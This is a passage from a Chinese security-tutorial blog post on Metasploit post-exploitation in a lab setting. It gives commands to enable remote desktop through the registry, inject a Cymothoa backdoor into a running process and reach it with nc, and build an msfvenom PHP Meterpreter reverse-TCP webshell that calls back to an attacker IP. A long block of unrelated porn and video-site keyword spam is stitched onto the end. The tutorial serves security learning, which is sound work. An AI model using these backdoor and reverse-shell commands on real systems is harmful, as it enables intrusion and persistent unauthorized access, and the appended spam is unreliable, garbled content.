# 開啟遠程連接 echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat # 查看網絡端口 netstat -an # 遠程連接 rdesktop 192.168.44.135

作者掃描發現3389端口已經開啟,也可以直接利用。

(3) 輸入命令連接遠程IP地址,并輸入我們創建好的hacker用戶名及密碼。

  • rdesktop 192.168.44.135

輸入創建的用戶名hacker和密碼123456回車,彈出提示框點擊OK,稍等就會成功登錄XP系統。

這是本文的深度提權知識。

(4) 最后,我們還需要將新建的用戶名hacker刪除。

寫到這里,整個實驗就講解完畢。


五.后滲透攻擊之后門

在完成提升權限后,我們就應該建立后門(backdoor),以維持對目標主機的控制權。這樣,即使我們所利用的漏洞被補丁程序修復,還可以通過后門繼續控制目標系統。

簡單的說,后門就是一個留在目標主機上的軟件,它可以使攻擊者隨時連接到目標主機。大多數情況下,后門是一個運行在目標主機上的隱藏進程,它運行一個普通的、未經授權的用戶控制計算機。

1.操作系統Cymothoa后門

后門泛指繞過目標系統安全控制體系的正規yoghurt認證過程,從而維持我們對目標系統的控制權,以及隱匿控制行為的方法。Meterpreter提供了Persistence等后滲透攻擊模塊,通過再目標主機上安裝自動、永久服務等方式,來長久地控制目標機。這里主要介紹Cymothoa后門,還有Persistence后門,APT樣本中也有各種各樣的后門。

Cymothoa是一個后門工具,可以將ShellCode注入到現有進程(插進程)。借助這種注入手段,它能夠把ShellCode偽裝成常規程序。只要進程存在,后門就會有效,所以一般選擇一些自其服務的進程來注入,例如web服務mysql、apache 等。其后門所擁有的權限和注入的進程權限是相同的。當拿下目標shell后就可以使用cymothoa添加后門。

Cymothoa所注入的后門程序應當能夠與被注入的程序(進程)共存,以避免被管理和維護人員懷疑。將ShellCode注入其他進程,還有另一個優勢:即使目標系統的安全防護工具能夠監視可執行程序的完整性,只要它不檢測內存,就發現不了(插進程)后門程序的進程。

(1) 查看程序的PID。

  • Linux:ps -aux
  • Windows:tasklist

(2) 查看ShellCode編號。
Cymothoa有很多的后門 shellcode,這些shellcode可以通過-S參數來查看。

  • cymothoa -S

(3) 生成后門程序。
成功滲透目標主機后,就可以把Cymothoa的可執行程序復制到目標主機上,生成后門程序。如選擇PID為903的進程為宿主進程,選用第一類ShellCode,指定Payload服務端口號為4444。

  • cymothoa -p 903 -s 1 -y 4444

遺憾這里失敗,后續文章會更深入的講解后門實戰知識。

在實戰中你需要對目標機上傳編譯好的Cymothoa進行后門注入,成功則如下圖所示。

(4) NC連接后門程序。
注入成功后,我們通過攻擊機器 kali 來使用 nc 連接,因為我第一次使用的 nvv 參數,會顯示所有的詳細信息,所以內容比較咋。可以看到 ip 已經是目標機的 ip,身份是 root。

  • nc -nvv IP地址 端口號

這時把msf關閉,然后再次通過nc連接,查看ip和當前用戶,該后門成功被利用。

注意,該后門注入系統的進程,反彈的是該進程相應的權限(并不需要root),當然,因為后門是以運行中的程序為宿主,所以只要進程關閉或目標主機重啟,后門就會停止運行。


2.Web后門

Web后門泛指Webshell,其實就是一段網頁代碼,包括ASP、PHP、JSP等。由于這些代碼都運行在服務器端,攻擊者通過這段精心設計的代碼,在服務端進行一些危險的操作以后去敏感信息,或者通過滲透操作提權,從而獲得服務器的控制權。這也是攻擊者控制服務器的方法,比入侵攻擊更加隱蔽。

Web后門能給攻擊者提供非常多的功能,比如執行命令、瀏覽文件、輔助提權、執行SQL語句、反彈Shell等。Windows操作系統下比較出名的是“中國菜刀”,還有開源的工具如蟻劍、冰蝎、Cknife等,均支持Mac、Linux和Windows。之前的文章也多次分享過一句話+工具的用法。

在Kali下用得比較多的是Weevely,其功能很強大,使用http頭進行指令傳輸,唯一的缺點是只支持PHP。其實Metasploit框架中也自帶了Web后面,配合Meterpreter使用時,功能更強大。接下來我們簡單用Meterpreter實現一個Web后門(PHP Meterpreter后門、ASP Meterpreter后門)。

在Metasploit中,有一個名為PHP Meterpreter的Payload,利用這個模塊可以創建具有Meterpreter功能的PHP Webshell。在攻擊中使用Metasploit PHP Shell的步驟如下:

  • 使用msfvenom創建一個webshell.php
  • 上傳webshell.php到目標服務器
  • 運行Metasploit multi-handler開始監聽
  • 訪問webshell.php頁面
  • 獲取反彈的Metasploit Shell

(1) 通過Metasploit的Msfvenom工具會做PHP Meterpreter。

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.44.138 -f raw > shuteer.php

參數-p用于設置Payload,參數-f用于設置輸出文件格式,生成的文件如下所示。

打開shutter.php文件如下圖所示,這是一個webshell。

(2) 將shutter.php文件上傳到目標服務器。這里是虛擬機,就直接復制到 var/www/html 目錄。

(3) 開啟msfconsole連接PHP后門。

通過MSF我們成功反彈服務器,最后利用Meterpreter進行后滲透操作。

注意,這里大家也可以嘗試蟻劍、菜刀、冰蝎等工具。也建議大家好好思考:

  • 如何有效檢測Webshell
  • 如何結合深度學習實現Webshell的自動化生成和繞WAF
  • 如何結合深度學習自動化檢測Webshell

六.總結

寫到這里,這篇文章就介紹完畢,希望您喜歡,本文主要是學習徐焱老師他們的《Web安全攻防滲透測試實戰指南》,同時結合作者之前的漏洞利用及WannaCry逆向經驗總結。文章非常長,作者也花費了很長時間,但相信只要你認真讀完并復現,肯定會有收獲,尤其是對MSF的理解。

  • 一.MSF漏洞利用
  • 二.后滲透攻擊之信息收集
    1.進程遷移
    2.系統命令
    3.文件系統命令
  • 三.后滲透攻擊之權限提升
    1.權限查詢
    2.利用WMIC實戰MS16-032本地溢出漏洞
    3.令牌竊取提權
    4.Hash攻擊提權
  • 四.后滲透攻擊之移植自定義漏洞利用模塊
    1.傳統MS08-067漏洞利用
    2.移植github的MS17-010漏洞模塊
    3.深度提權
  • 五.后滲透攻擊之后門
    1.操作系統Cymothoa后門
    2.Web后門

這篇文章中如果存在一些不足,還請海涵。作者作為網絡安全初學者的慢慢成長路吧!希望未來能更透徹撰寫相關文章。同時非常感謝參考文獻中的安全大佬們的文章分享,感謝師傅、師兄師弟、師姐師妹們的教導,深知自己很菜,得努力前行。

歡迎大家討論,是否覺得這系列文章幫助到您!任何建議都可以評論告知讀者,共勉。

  • 逆向分析:https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
  • 網絡安全:https://github.com/eastmountyxz/NetworkSecuritySelf-study

(By:Eastmount 2022-01-15 夜于武漢 http://blog.csdn.net/eastmount/ )


參考文章如下,感謝這些大佬。

  • [1] https://www.rapid7.com/products/metasploit/download/
  • [2] 《Web安全攻防滲透測試實戰指南》徐焱、李文軒、王東亞老師
  • [3] https://blog.csdn.net/Eastmount
  • [4] https://www.cnblogs.com/coderge/p/13746810.html
  • [5] https://blog.csdn.net/fageweiketang/article/details/86580213
  • [6] https://blog.csdn.net/fageweiketang/article/details/86665518
  • [7] https://www.cnblogs.com/-qing-/p/10519363.html
  • [8] https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

總結

以上是生活随笔為你收集整理的[系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

亚洲少妇久久 | 亚洲乱亚洲乱亚洲 | 97人人超 | av在观看 | 久久精品麻豆 | 国产高清一区二区 | 国产精品一区免费在线观看 | 开心综合网 | 一级黄色片在线免费观看 | 天天色天天综合网 | 在线看欧美 | 国产xxxxx在线观看 | 久久久亚洲影院 | 国产精品人人做人人爽人人添 | 国产精品123 | 久久国产精品视频 | 久久久精品小视频 | 成人黄视频| 97国产小视频 | 天堂久久电影网 | 97超碰人人澡人人爱 | 福利视频第一页 | 美女网站在线观看 | 69国产精品视频免费观看 | 日韩高清在线看 | 日韩av中文字幕在线免费观看 | 美腿丝袜av | 国产亚洲va综合人人澡精品 | 久久久www成人免费毛片麻豆 | av线上看| 伊人开心激情 | 美女免费视频黄 | 国产98色在线 | 日韩 | 福利一区在线视频 | 久久久精品小视频 | 久久国产精品影视 | 久久精品香蕉视频 | 亚洲天堂首页 | 在线免费观看视频a | 久草在线观 | 91看片淫黄大片在线播放 | 伊人网站| 久久这里精品视频 | 色综合久久精品 | 国产不卡高清 | 麻豆一区二区 | 亚洲精品色视频 | 成人av电影在线观看 | 婷婷国产一区二区三区 | 天天色天天干天天 | 国产二区免费视频 | 久久久国产精品一区二区三区 | 天堂在线免费视频 | 一区二区视频播放 | 婷婷伊人五月 | 日韩欧美一区二区三区免费观看 | 中文字幕精品视频 | 日韩黄视频 | 国产精品一二 | 欧美日韩性生活 | 视频一区二区免费 | 中文字幕免费观看全部电影 | 天天色天天射综合网 | 欧美极品久久 | 欧美国产日韩一区二区 | 欧美91片| 欧美孕交vivoestv另类 | 五月婷婷导航 | 91视频在线国产 | 欧美日韩在线视频免费 | 69av久久| 六月丁香久久 | 日韩精品播放 | 日日夜夜噜噜噜 | 日韩av电影免费在线观看 | 在线看av网址| av在线播放快速免费阴 | 五月天色综合 | 黄色网中文字幕 | 亚洲欧美成aⅴ人在线观看 四虎在线观看 | 日韩欧美xxxx| 波多野结衣在线视频一区 | 中文字幕丝袜制服 | 国内精品久久久久久久97牛牛 | 国产在线观看a | 99在线免费观看视频 | 久久久免费观看 | 日韩在线看片 | 婷婷激情五月 | 最近字幕在线观看第一季 | 日韩av不卡在线 | 欧美色图狠狠干 | 欧美日韩精品在线观看 | 成人免费观看a | 国产精品 国产精品 | 97网站| 午夜精品一区二区三区在线播放 | 亚洲最大成人免费网站 | 中文字幕免费高清在线观看 | 999成人网| 91日韩在线播放 | 91精品国产综合久久婷婷香蕉 | 国产精品成人在线观看 | 国产精品久久99综合免费观看尤物 | 亚洲永久精品在线 | 色黄www小说 | 丁香5月婷婷久久 | 西西大胆免费视频 | 久久久久久久国产精品影院 | 欧美综合色在线图区 | 亚洲日本激情 | 久久伊人色综合 | 国产艹b视频 | 精品国产三级a∨在线欧美 免费一级片在线观看 | 久久艹艹 | 在线免费观看视频一区二区三区 | 中文字幕av一区二区三区四区 | 日韩精品2区 | 天天色天天色天天色 | 少妇高潮流白浆在线观看 | 婷婷在线看 | 天天色天天艹 | 激情综合五月 | 激情丁香5月 | 天天操天天干天天操天天干 | 精品久久久久国产免费第一页 | 91精品视频一区二区三区 | 久久99偷拍视频 | 91色网址| 成人影片在线免费观看 | 8x8x在线观看视频 | 一级黄色大片在线观看 | 日韩黄色免费看 | 国产高清av在线播放 | 国产美女免费观看 | 99精品免费久久久久久日本 | 国产精品国产三级国产不产一地 | 欧美日韩在线视频观看 | 国内精品视频在线 | 亚洲国产成人久久 | 久久香蕉电影网 | 韩国精品一区二区三区六区色诱 | 久久久久久网址 | 成人日批视频 | 99在线国产 | 久久人人爽人人爽人人片av软件 | 日韩视频www| 成人免费在线看片 | 色婷婷播放 | 日韩欧美精品在线 | 青春草视频 | 日韩久久久久久久 | 在线视频手机国产 | 成人免费观看a | 国产一区二区在线播放 | 99免费精品 | 特级aaa毛片| 国产精品一二三 | 激情五月综合 | 日韩精品免费在线播放 | 日日日干| 91天堂素人约啪 | 日韩av进入 | 一区二区欧美在线观看 | 91成人免费在线视频 | 国产成人精品久久二区二区 | 91毛片在线观看 | 久久福利小视频 | 久热色超碰 | 精品女同一区二区三区在线观看 | 在线免费黄网站 | 国内三级在线观看 | 日韩偷拍精品 | 国产精品第2页 | 高清有码中文字幕 | 国产精品v a免费视频 | 99久久精品免费看国产一区二区三区 | 在线观看视频一区二区三区 | 欧美网址在线观看 | 一区二区影视 | 人人爽人人爽人人爽人人爽 | 亚洲国产精彩中文乱码av | 在线国产一区二区 | 成人免费在线播放 | japanesexxxhd奶水| 欧美日韩另类在线观看 | 中文字幕乱在线伦视频中文字幕乱码在线 | 欧美伦理一区二区三区 | 成人久久久电影 | 亚洲在线日韩 | 91桃色免费观看 | 久草在线视频资源 | a天堂在线看| 久草精品网| 免费观看日韩av | 欧美色图亚洲图片 | 日韩在线高清免费视频 | 男女全黄一级一级高潮免费看 | 99在线观看免费视频精品观看 | 免费观看mv大片高清 | 在线成人小视频 | 人交video另类hd | 日韩美女免费线视频 | 九九在线视频 | 国产va饥渴难耐女保洁员在线观看 | 天堂久色| 探花系列在线 | 91麻豆网站| 一区二区三区中文字幕在线 | 中文一区在线观看 | 久久香蕉电影 | 国产精品久久久久久久久久久久冷 | 视频高清 | 国产免费三级在线观看 | 久久久私人影院 | www.av小说 | 五月婷社区 | 99精品视频在线观看免费 | 免费av小说| 中文字幕电影一区 | 国产一区久久久 | 国产精品99久久久久久久久久久久 | 五月婷婷毛片 | 国产精品久久久久影视 | 成人欧美在线 | 日韩激情第一页 | 超碰av在线| 99久久婷婷国产 | av电影免费观看 | 久久男人中文字幕资源站 | 成年人免费在线观看网站 | 国产精品久久久久久久久久直播 | 精品一区二区影视 | 区一区二在线 | 国产麻豆视频免费观看 | 精品视频在线免费观看 | 18+视频网站链接 | 欧美国产日韩激情 | 中文字幕免费观看视频 | 色婷婷综合五月 | 免费高清在线观看成人 | 亚洲理论电影 | 久久艹在线观看 | 玖玖精品视频 | 国产理伦在线 | 国产精品av久久久久久无 | 国产一区二区三区 在线 | 在线婷婷| 中文字幕av在线免费 | 日本在线观看一区二区三区 | 96av麻豆蜜桃一区二区 | 日本黄色黄网站 | 超碰国产在线观看 | 婷婷在线免费 | 九九99靖品 | 青草视频在线免费 | 久在线| 久久久电影 | 日韩免费看的电影 | 成人免费视频视频在线观看 免费 | 久久视频在线观看免费 | 99色在线播放| 一本一道久久a久久精品蜜桃 | 日韩久久精品一区二区 | 免费av视屏 | 国产精品毛片久久 | 国产精品 亚洲精品 | 超碰免费观看 | 欧美一级日韩三级 | 国产不卡视频在线 | 五月天综合网 | 在线91精品 | 欧美日韩a视频 | 久热免费 | 99婷婷狠狠成为人免费视频 | 国产日韩在线一区 | 九九热在线精品 | 日韩精品短视频 | 伊人五月综合 | 一级黄色在线免费观看 | 五月天婷婷免费视频 | 国产精品久久久一区二区 | 国产精品一区二区三区免费看 | av中文字幕网址 | 久久亚洲婷婷 | 成人免费视频免费观看 | 亚洲欧美国产精品久久久久 | 免费观看成人网 | 手机看片99| 亚洲午夜久久久久久久久久久 | 中文字幕在线人 | 综合网欧美 | 日韩欧美黄色网址 | 免费在线中文字幕 | 美女视频久久久 | 成人免费网站在线观看 | 精品国产乱码 | 日韩激情免费视频 | 免费观看第二部31集 | 国产色婷婷| 欧美a级在线 | 午夜91视频 | 国产高清精品在线观看 | 日本天天色 | 日韩电影中文字幕 | 成人精品影视 | 91亚洲永久精品 | 国产成人精品一二三区 | 亚洲天天摸日日摸天天欢 | 国产精品18p | www日韩在线观看 | 在线观看成年人 | 亚洲国产福利视频 | 91一区二区在线 | 17婷婷久久www | www.国产在线 | 国产一区二区三区免费观看视频 | 午夜久久久精品 | 在线观看亚洲 | 欧美精品免费一区二区 | 日韩av图片 | 中文字幕在线观看的网站 | 亚洲激情校园春色 | 亚洲干视频在线观看 | 国产精品不卡视频 | 国产第一页精品 | www视频在线观看 | 玖玖在线播放 | 欧美精品天堂 | 日本成址在线观看 | 亚洲欧洲精品一区二区 | 久久99精品久久久久婷婷 | 中文字幕在线有码 | 17婷婷久久www | 国产精品淫片 | 中文av网| 特级毛片网 | 国产自产在线视频 | 中文字幕一区二 | 亚洲va欧洲va国产va不卡 | 天天干,天天操,天天射 | 在线天堂中文www视软件 | 国产欧美日韩一区 | 国产丝袜美腿在线 | 国产黄大片在线观看 | 亚洲精品mv在线观看 | 99免费在线播放99久久免费 | 国产你懂的在线 | 亚洲成人精品av | 伊人成人精品 | 久久这里只有精品23 | 日韩成人在线免费观看 | 高清av中文在线字幕观看1 | 日日干av | 日韩电影在线一区二区 | 天天爱天天色 | 国产成人a亚洲精品 | 又黄又刺激又爽的视频 | 国内精品久久影院 | 日韩二区三区在线观看 | 9在线观看免费高清完整版在线观看明 | 国产毛片aaa| av亚洲产国偷v产偷v自拍小说 | 日本成人a | 超碰97在线人人 | 免费久久网站 | 在线欧美最极品的av | 国产在线国产 | 狠狠狠色丁香婷婷综合激情 | 天天操人人干 | 久99久在线 | 国产小视频在线免费观看视频 | 久久伦理 | 国产视频一 | 九九精品视频在线看 | 国产精品久久久久久一区二区 | 国内精品美女在线观看 | 在线观看国产91 | 久久久 精品 | 中文字幕在线播出 | 欧美成年网站 | 97精品超碰一区二区三区 | 国产精品久久久久久久7电影 | 久久综合五月婷婷 | 97视频人人澡人人爽 | 国产亚洲久一区二区 | 久久精品爱爱视频 | www久久久久| 久久婷婷网 | 91精品视屏| 日韩视频免费看 | 最新日韩视频在线观看 | 二区三区毛片 | sesese图片 | 伊人久在线 | 国产在线综合视频 | 免费在线观看av网址 | 国产成人av一区二区三区在线观看 | 99精品国产一区二区 | 精品自拍网| 久久最新视频 | 国产精品成人一区 | 看片黄网站| 色视频国产直接看 | 人人干人人艹 | 911免费视频 | av天天色| 免费看一级一片 | 免费视频一二三区 | 色综合婷婷 | 精品亚洲欧美无人区乱码 | 免费在线观看成人av | 麻豆91精品 | 狠狠做深爱婷婷综合一区 | 国产人成免费视频 | 中文字幕一二 | 亚洲三级国产 | 久久综合九色综合97_ 久久久 | 欧美人交a欧美精品 | 久久久久久久久久久黄色 | 日日日操 | 婷婷久久婷婷 | 天天爱天天操 | 成人黄色资源 | 国产成人精品a | 91精品免费在线 | 人人爽人人 | 免费男女羞羞的视频网站中文字幕 | 国产不卡免费视频 | 美国三级黄色大片 | 制服丝袜一区二区 | 亚洲毛片视频 | 久久久午夜剧场 | 日本激情视频中文字幕 | 在线观看视频免费播放 | 视频成人永久免费视频 | 日韩一区二区三区高清在线观看 | 97精品国产91久久久久久久 | 国产不卡视频在线播放 | 日韩在线观看你懂的 | 激情图片区 | 日韩av在线影视 | 午夜免费电影院 | 久久99热这里只有精品 | 九九天堂 | www.成人sex| 日日爱影视 | 久久se视频| av播放在线 | 国产a级片免费观看 | 国产精品国产三级国产不产一地 | 四虎影视欧美 | 国产精品一区久久久久 | 成人永久视频 | 国产高清精品在线 | 伊人色**天天综合婷婷 | 99视频精品在线 | 国产成人a v电影 | 久久国产午夜精品理论片最新版本 | 日韩精品一区二区在线观看 | 色婷婷骚婷婷 | 国产精品一区久久久久 | 国产一区二区高清不卡 | 美女黄频视频大全 | 日韩免费视频一区二区 | 丁香婷婷社区 | 国产成人在线精品 | 天天干亚洲 | 四虎成人精品永久免费av九九 | 最近中文字幕免费av | 成人免费视频播放 | 日韩午夜一级片 | 午夜精品久久久久久久99水蜜桃 | 天无日天天操天天干 | 中文字幕国内精品 | 久久免费视频2 | 亚洲精品在线网站 | 啪啪免费视频网站 | 久久综合色8888 | 日本久久中文字幕 | 国产精品毛片久久蜜 | 青青草国产在线 | 久久一二三四 | 射综合网| 国产69久久| 在线观看欧美成人 | 在线成人中文字幕 | 国产精品99久久久久久久久久久久 | 欧美久草视频 | 国产视频综合在线 | 青青草国产成人99久久 | 日韩精品欧美精品 | 欧美性网站 | 免费看的黄色 | 91在线你懂的 | 欧洲性视频 | 欧美成人按摩 | 日韩高清在线不卡 | 久久久久久久久久久免费视频 | 国产色综合天天综合网 | 亚洲91视频 | 国产视频精品网 | 国际精品久久久久 | av片子在线观看 | 日日夜夜天天久久 | 国产网站色 | 色婷婷久久 | 超碰国产在线 | 手机av网站 | 激情综合六月 | 国产精品久久久久久久久久东京 | 97精品超碰一区二区三区 | 亚洲国产日本 | 综合色在线观看 | 国产一区二区三区黄 | 亚洲人成网站精品片在线观看 | 91探花视频 | 中文字幕制服丝袜av久久 | 精品久久久久久亚洲 | 园产精品久久久久久久7电影 | 婷婷狠狠操 | 五月天综合激情 | 最新日韩在线观看视频 | 免费av小说 | 青青草视频精品 | 黄色一级免费网站 | 国际av在线 | 日韩在线视频观看 | 91成人精品一区在线播放69 | 综合色站 | 天天干天天做天天爱 | 91看片在线观看 | 国产精品6999成人免费视频 | 国产福利电影网址 | 黄色毛片一级片 | 成人在线免费观看视视频 | 日韩精品一区二区不卡 | 狠狠色伊人亚洲综合网站色 | 日韩高清dvd | 日韩特黄av | 国产精品久久一区二区三区不卡 | 美女网站视频色 | 国产剧在线观看片 | 久久久久久久久久久久久影院 | 偷拍精偷拍精品欧洲亚洲网站 | 精品在线一区二区三区 | 日韩综合一区二区三区 | 久久久久久久久久电影 | 国产五十路毛片 | www91在线| a天堂最新版中文在线地址 久久99久久精品国产 | 深夜男人影院 | 国产精品高清一区二区三区 | bbw av | 久艹在线播放 | 激情婷婷在线 | 久久久久久久99 | 97超级碰碰碰碰久久久久 | 久草网站在线观看 | 免费观看www7722午夜电影 | 亚洲欧美怡红院 | 色婷婷天天干 | 成年人在线免费看视频 | 免费a视频在线 | 欧美不卡视频在线 | av中文资源在线 | 日韩av高清在线观看 | 免费的成人av | 亚洲精品99久久久久中文字幕 | 麻豆91精品 | 99在线精品视频观看 | www.久久91| 最新国产精品拍自在线播放 | 成人国产精品电影 | 久久精品视频在线免费观看 | 99精品一区 | 久久99精品久久久久久久久久久久 | 九草在线观看 | 亚洲欧洲一区二区在线观看 | 中文成人字幕 | 亚洲在线视频免费 | 精品久久一二三区 | 欧美一区二区三区在线视频观看 | 91精品久久久久久粉嫩 | 亚洲1区 在线 | 九九爱免费视频在线观看 | 国产亚洲免费的视频看 | 免费av看片 | 一区二区久久久久 | 国产裸体无遮挡 | 99精品在线视频播放 | 丝袜一区在线 | 911国产 | 欧美一级看片 | 在线播放日韩 | 一区二区三区四区免费视频 | 日产乱码一二三区别在线 | 深夜男人影院 | 911香蕉 | 成人影片免费 | 午夜久久久久久久 | 一区二区欧美日韩 | 久久99精品久久只有精品 | 久久人人爽人人爽 | 国产淫片 | 黄色的网站在线 | 欧美视频二区 | 一本一道久久a久久综合蜜桃 | 99电影456麻豆 | 国产精品免费看久久久8精臀av | 久久久福利视频 | 日本一区二区三区视频在线播放 | 久久亚洲区| 九九精品久久 | 国产精品久久久久久久久久久久午 | 日日碰狠狠添天天爽超碰97久久 | 国产一级片免费观看 | 久久精品电影院 | 国产毛片久久久 | 欧美日韩网址 | 久久久免费| 97国产精品一区二区 | 中文字幕高清免费日韩视频在线 | 日本h视频在线观看 | 日韩精品一区二区免费视频 | 成人免费视频观看 | 亚洲精品成人免费 | 综合精品久久 | 81精品国产乱码久久久久久 | 国产精品乱码一区二三区 | 精品欧美在线视频 | 色一级片 | 色狠狠综合 | 最近免费中文字幕大全高清10 | 96亚洲精品久久久蜜桃 | 狠狠躁夜夜躁人人爽超碰97香蕉 | 国产精品成人免费精品自在线观看 | 国产精品每日更新 | 手机看片久久 | 一本一道久久a久久精品 | 免费涩涩网站 | 99在线免费视频 | 色多多视频在线 | 人人舔人人 | 在线播放视频一区 | 伊人激情综合 | 人人澡超碰碰97碰碰碰软件 | 中文字幕一区二区三区四区视频 | 操高跟美女 | 9999国产| 超碰在线个人 | 日本久久久久久久久久久 | 99精品在线视频观看 | 97超碰人人澡人人爱学生 | 黄色亚洲免费 | 夜色资源网 | 日韩精品 在线视频 | 国产1区2 | 国产视频资源 | 香蕉视频在线播放 | 久久a v电影 | 99视频在线观看视频 | 久久国产片| 亚洲欧洲精品一区二区精品久久久 | 中文字幕久久网 | 国内精品久久天天躁人人爽 | 久久国精品 | 麻豆av一区二区三区在线观看 | 久久免费视频7 | 看片网站黄 | 深爱激情开心 | 色爽网站 | 久久福利在线 | 波多野结依在线观看 | 少妇bbw撒尿| 欧美激情视频在线观看免费 | 日韩夜夜爽 | 久久久久久久久久久成人 | 黄色av电影一级片 | 亚洲高清在线精品 | 午夜精品久久久久久中宇69 | 手机色在线| 久久亚洲二区 | 国产成人在线一区 | 天海翼一区二区三区免费 | 精品视频免费久久久看 | 亚洲九九九在线观看 | 中文av在线免费观看 | 日韩中文字幕免费视频 | 亚洲精品国产精品久久99热 | 国产美女被啪进深处喷白浆视频 | 美女视频a美女大全免费下载蜜臀 | 免费在线激情电影 | 成人免费在线视频观看 | 成全免费观看视频 | 国产精品成人免费精品自在线观看 | 中文字幕精品久久 | 夜色资源站国产www在线视频 | 九七视频在线观看 | 国产专区视频在线 | 国产福利免费在线观看 | 欧美一级在线看 | 欧美日韩久久不卡 | 天天色天天上天天操 | 在线播放亚洲 | 91av播放| 午夜精品电影 | 精品久久一区二区 | 一级一片免费看 | 亚洲年轻女教师毛茸茸 | 欧美 日韩 国产 中文字幕 | 日韩在线观看你懂的 | 亚洲一级黄色av | 免费 在线 中文 日本 | 免费在线黄 | www.超碰97.com| 不卡的一区二区三区 | 国产午夜麻豆影院在线观看 | 亚洲第一区在线播放 | 日韩免费看视频 | 国产精品久久久久永久免费看 | 久章草在线 | 久久久国产在线视频 | 国产亚洲精品无 | 成年人看片网站 | 国产美女精品 | 国产精品对白一区二区三区 | 狠狠干狠狠操 | 精品高清美女精品国产区 | 91精品国自产在线观看 | 成人一级 | 国产一区二区久久久久 | 麻豆高清免费国产一区 | 午夜黄网| 96av麻豆蜜桃一区二区 | www.成人久久 | 久久久国产影院 | 国际精品网| a午夜在线 | 日韩精品一区二区在线观看视频 | 日韩午夜电影网 | 中文字幕免费高 | 日韩有色 | 精品国产一区二区三区日日嗨 | 日日夜夜人人精品 | 亚洲高清在线视频 | 在线视频一区二区 | 特级xxxxx欧美 | 一区二区三区中文字幕在线观看 | 国产小视频在线免费观看 | 成人一级影视 | 91福利社在线观看 | 91av网址| 色狠狠操 | 亚洲天堂社区 | 91自拍视频在线观看 | 亚洲免费a | 久久久久女教师免费一区 | 色视频在线免费 | 天天综合精品 | 日韩在线视频免费观看 | 91丨九色丨高潮丰满 | 五月天色站 | 色综合中文综合网 | 五月天婷婷在线观看视频 | 亚洲影视资源 | 国内精品久久久久久久影视麻豆 | 欧美日韩免费一区二区 | 日韩系列在线 | 天天干 夜夜操 | 在线观看视频在线观看 | 国产又粗又猛又黄 | 日韩免费在线视频观看 | 黄色一级免费电影 | 狠狠久久综合 | 99热亚洲精品 | 五月激情婷婷丁香 | 午夜色大片在线观看 | 久久久久国产成人精品亚洲午夜 | 国产免费三级在线观看 | 久久国内精品99久久6app | 精品一区二区免费 | 免费亚洲黄色 | 在线日本看片免费人成视久网 | 国产专区一 | 三级av黄色 | 久久精品一区二区三区中文字幕 | 超碰在线最新网址 | 国产精品久久久久久久久久新婚 | 中文字幕韩在线第一页 | 天天操狠狠干 | 亚洲精品在线观看免费 | 欧美成年网站 | 国产一二区视频 | 精品99视频 | 一本一本久久a久久精品牛牛影视 | 久久久久久久久久久久国产精品 | 国产成人精品午夜在线播放 | 国产精品一区二区三区四 | 五月天色丁香 | 91麻豆国产福利在线观看 | 精品一区免费 | 日日摸日日| 成人观看视频 | 中文字幕永久 | 日韩一区二区三区免费视频 | 美女视频久久 | 日日日干| 麻豆视频观看 | 一区二区高清在线 | 国产一级视频在线免费观看 | 激情深爱五月 | 三级在线播放视频 | 日韩在线二区 | 日韩高清精品免费观看 | 日韩国产高清在线 | 精品一区二区在线免费观看 | 中文字幕在线资源 | a一片一级 | 国产精品一区二区美女视频免费看 | 偷拍精偷拍精品欧洲亚洲网站 | 久久久精品国产一区二区电影四季 | 久久久久久免费 | 精品久久久久一区二区国产 | 亚洲最新毛片 | 黄色毛片视频免费 | 婷久久 | 国产在线观看污片 | 人人澡人人草 | 欧美日韩中文字幕综合视频 | 最近最新中文字幕 | 日韩精品视频在线观看网址 | 亚洲 综合 精品 | 日本三级全黄少妇三2023 | 精品国产一二三 | 国产精品美女久久久久久久网站 | 亚洲精品美女久久17c | 欧美日韩视频在线一区 | 久久久久久久久亚洲精品 | 91九色视频在线 | 国产尤物视频在线 | 久久免费视频网站 | 伊人黄 | 特级西西人体444是什么意思 | 国产一区网址 | 欧美日韩在线视频一区 | 91热精品视频| 色丁香久久 | 免费av网站在线看 | 综合久久精品 | 国产成人久久av977小说 | 四虎在线免费观看 | 国产尤物在线 | 国产精品少妇 | 91精品国产一区二区在线观看 | 8x成人在线 | 亚洲三级毛片 | 三级黄在线 | 天天插一插 | 91成年人视频 | 欧美伦理一区二区 | 欧美日韩高清在线观看 | 毛片一区二区 | av在线a| 国产1区2区 | 狠狠干网址 | 欧美日韩国产精品一区二区 | 成人免费 在线播放 | 色在线国产 | 亚洲黄色免费观看 | 97在线免费观看 | 91一区啪爱嗯打偷拍欧美 | 中文字幕在线国产精品 | 亚洲综合色丁香婷婷六月图片 | 夜夜夜精品 | 国产黄免费在线观看 | 97成人在线观看视频 | 免费网站在线观看人 | 亚洲黄网站 | 亚洲欧美在线视频免费 | 草久电影| 天天色天天综合 | 91丨九色丨国产女 | 久久婷婷色 | 免费在线国产精品 | 久久久99精品免费观看app | 中文字幕视频网 | 亚洲综合涩| 亚洲国产精品女人久久久 | 久久久久久久久久久影视 | 免费一区在线 | 中国一级片在线观看 | 日韩在线视频国产 | 四虎在线永久免费观看 | 日韩r级电影在线观看 | 国产精品av免费观看 | 中文日韩在线视频 | 婷婷激情综合网 | 久久不卡国产精品一区二区 | 四虎成人精品 | 国产露脸91国语对白 | 日韩一级理论片 | 最新国产精品拍自在线播放 | 久久在线影院 | av资源在线看 | 色婷婷成人网 | 精品久久久久国产 | 在线你懂 | 黄色中文字幕在线 | 国产不卡在线 | 91在线网址 | 四虎在线观看精品视频 | 日本视频高清 | 欧美激情综合五月色丁香 | 久草精品视频在线看网站免费 | 一级黄色毛片 | 成人黄色在线 | 婷婷激情综合五月天 | 国产999视频 | 亚洲涩涩涩涩涩涩 | 亚洲国产精品999 | 在线久热 | 久久免费视频国产 | 国产成人一区二区三区久久精品 | 天天综合网国产 | 一本一道久久a久久精品蜜桃 | 婷婷激情网站 | 日韩动漫免费观看高清完整版在线观看 | 国产免码va在线观看免费 | 亚洲黄色成人网 | 